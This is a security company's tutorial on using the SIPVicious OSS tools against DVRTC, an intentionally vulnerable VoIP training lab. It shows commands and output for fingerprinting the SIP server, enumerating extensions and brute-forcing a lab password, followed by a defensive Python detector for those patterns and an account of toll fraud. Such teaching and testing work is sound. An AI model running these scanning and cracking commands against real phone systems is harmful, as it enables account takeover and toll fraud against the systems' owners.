Sandro Gauci, Enable Security

SIPVicious tutorial: testing VoIP security with DVRTC

TL;DR

We use SIPVicious OSS to scan, enumerate extensions, and crack passwords on our DVRTC vulnerable lab at pbx1.dvrtc.net. If you want to get your hands dirty with VoIP security testing, this is a good place to start.

Background

Back in 2020, our colleague Pinaki wrote a tutorial on attacking a VoIP system with SIPVicious OSS using our old demo server at demo.sipvicious.pro. That server has since been retired.

We now have something much better: DVRTC (Damn Vulnerable Real-Time Communications), a full vulnerable VoIP/WebRTC lab with guided exercises and a public instance at pbx1.dvrtc.net. DVRTC packs Kamailio, Asterisk, rtpengine, coturn, and more, all intentionally misconfigured for training purposes.

This post focuses on the SIPVicious OSS basics. For the full range of exercises (RTP bleed, TURN abuse, digest leak, and more), check the DVRTC exercise docs.

Getting started

SIPVicious OSS (SVOSS) is freely available on our GitHub. Install it with:

pip install sipvicious

Make sure you have the latest version (v0.3.7 at time of writing):

sipvicious_svmap --version

You’ll need Python 3.6 or later. For full details, see the installation wiki.

Reconnaissance with svmap

The first step in any VoIP pentest is figuring out what we’re dealing with. Let’s map our target with svmap:

sipvicious_svmap pbx1.dvrtc.net
+---------------------+---------------------------------+
| SIP Device          | User Agent                      |
+=====================+=================================+
| 139.162.183.14:5060 | kamailio (6.1.1 (x86_64/Linux)) |
+---------------------+---------------------------------+

So we have a Kamailio 6.1.1 server handling SIP over UDP, sitting in front of the rest of the stack as a SIP proxy.

Now, what happens when we target a specific extension? Let’s try 1000:

sipvicious_svmap pbx1.dvrtc.net -e 1000
+---------------------+---------------------------------------------+
| SIP Device          | User Agent                                  |
+=====================+=============================================+
| 139.162.183.14:5060 | Asterisk PBX 22.8.2+dfsg+~cs6.15.60671435-1 |
+---------------------+---------------------------------------------+

A completely different User-Agent! The request for extension 1000 gets routed through Kamailio to an Asterisk PBX behind it. This is a pretty standard SIP proxy + PBX deployment. From the perspective of a pentester, knowing what sits behind the proxy is valuable information, and in this case the routing through Kamailio reveals exactly what’s behind it.

Enumerating extensions with svwar

Now that we have a feel for the target, let’s enumerate the extensions with svwar:

sipvicious_svwar pbx1.dvrtc.net -e 1000-2000
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 1000      | reqauth        |
+-----------+----------------+
| 1100      | reqauth        |
+-----------+----------------+
| 1200      | reqauth        |
+-----------+----------------+
| 1300      | reqauth        |
+-----------+----------------+
| 2000      | reqauth        |
+-----------+----------------+

svwar found 5 extensions, all requiring authentication. It works by sending SIP REGISTER requests and looking at what comes back: a 401 means the extension exists (but needs credentials), while a 404 means it doesn’t. In fact, if you run svwar with the -vv flag, you’ll notice the server responds with 404 enumerate me baby for invalid extensions. Yes, that’s intentional ;-)

Cracking passwords with svcrack

We have extensions, so the obvious next question is: do any of them have weak passwords? That’s what svcrack is for. Let’s try the default numeric range first:

sipvicious_svcrack pbx1.dvrtc.net -u 1000 -v
INFO:ASipOfRedWine:trying to get self ip .. might take a while
INFO:root:scan started at 2026-04-12 16:25:39.014348
INFO:ASipOfRedWine:no more passwords
WARNING:root:found nothing
INFO:root:Total time: 0:00:18.189742

Nothing. The default password set is a numeric range from 100 to 999, which isn’t large enough. Let’s try the --enabledefaults flag, which adds common passwords (including the extension number itself and predictable patterns):

sipvicious_svcrack pbx1.dvrtc.net -u 1000 --enabledefaults -v
INFO:ASipOfRedWine:trying to get self ip .. might take a while
INFO:root:scan started at 2026-04-12 16:25:12.235809
INFO:ASipOfRedWine:The password for 1000 is 1500
INFO:root:we have 1 cracked users
INFO:root:Total time: 0:00:00.168962
+-----------+----------+
| Extension | Password |
+===========+==========+
| 1000      | 1500     |
+-----------+----------+

There we go! Extension 1000 has a password of 1500. You could also find this by specifying a custom numeric range with --range:

sipvicious_svcrack pbx1.dvrtc.net -u 1000 --range 1000-2000 -v
INFO:ASipOfRedWine:trying to get self ip .. might take a while
INFO:root:scan started at 2026-04-12 16:25:25.094604
INFO:ASipOfRedWine:The password for 1000 is 1500
INFO:root:we have 1 cracked users
INFO:root:Total time: 0:00:04.524195
+-----------+----------+
| Extension | Password |
+===========+==========+
| 1000      | 1500     |
+-----------+----------+
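
From the defender's side, both the svwar sweep and the svcrack run leave a recognisable pattern in REGISTER responses: one source touching many extensions and mostly getting 404s, or one source collecting dozens of 401s for a single extension. The following is an added example, not part of SIPVicious or DVRTC; the record format (source IP, method, extension, status code), the thresholds and the sample data are assumptions made for illustration.

```python
from collections import defaultdict

def detect(records, max_exts=10, max_401=20):
    """records: (src_ip, method, extension, status) tuples from ONE time window."""
    probed = defaultdict(set)      # src -> distinct extensions seen in REGISTER
    missing = defaultdict(int)     # src -> 404 replies (extension does not exist)
    challenged = defaultdict(int)  # (src, ext) -> 401 replies
    for src, method, ext, status in records:
        if method != "REGISTER":
            continue
        probed[src].add(ext)
        if status == 404:
            missing[src] += 1
        elif status == 401:
            challenged[(src, ext)] += 1
    findings = defaultdict(set)
    for src, exts in probed.items():
        # A phone registers one or two accounts; a sweep touches many and,
        # on a server that answers 404 for unknown users, mostly misses.
        if len(exts) > max_exts and missing[src] > len(exts) // 2:
            findings[src].add("extension-enumeration")
    for (src, ext), count in challenged.items():
        # One 401 per registration is the normal digest challenge;
        # dozens for the same extension are password guesses.
        if count > max_401:
            findings[src].add(f"password-guessing:{ext}")
    return dict(findings)

def sample_window():
    # Constructed records (documentation IP ranges), not captured traffic.
    sweep = [("203.0.113.5", "REGISTER", str(e), 401 if e == 1000 else 404)
             for e in range(1000, 1030)]
    guesses = [("198.51.100.7", "REGISTER", "1000", 401)] * 40
    phone = [("192.0.2.10", "REGISTER", "1100", 401),
             ("192.0.2.10", "REGISTER", "1100", 200)]
    return sweep + guesses + phone

if __name__ == "__main__":
    for src, labels in detect(sample_window()).items():
        print(src, sorted(labels))
```

The 404 condition depends on the server distinguishing unknown extensions, as the DVRTC instance does; a server that challenges every REGISTER with 401 removes that signal, and the distinct-extension count has to carry the detection on its own.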

What can an attacker do with SIP credentials?

On a production PBX connected to PSTN, the most common outcome is toll fraud: the attacker registers with the stolen extension and starts making international or premium-rate calls. The victim gets stuck with the phone bill. We’ve seen cases where this leads to tens of thousands in charges over a weekend. It’s been happening for years and it’s still one of the most common VoIP attacks.

DVRTC is not connected to PSTN (of course), so no expensive calls here. But the techniques are the same ones an attacker would use against a real target.

Going further

This tutorial only covers the basics. DVRTC has 7 exercises covering 12 attack paths, including traffic analysis, RTP bleed, SIP digest leak, TURN relay abuse, and offline credential cracking. You can also run your own DVRTC instance locally with Docker Compose if you want a private lab to experiment with.

Of course, if what you actually need is a professional VoIP penetration testing service, get in touch ;-)

Sandro Gauci

CEO, Chief Mischief Officer at Enable Security

Sandro Gauci leads the operations and research at Enable Security. He is the original developer of SIPVicious OSS, the SIP security testing toolset. His role is to focus on the vision of the company, design offensive security tools and engage in security research and testing. Therefore, he is the proud owner of the title of Chief Mischief Officer at Enable Security.

He offers public office hours and is reachable here.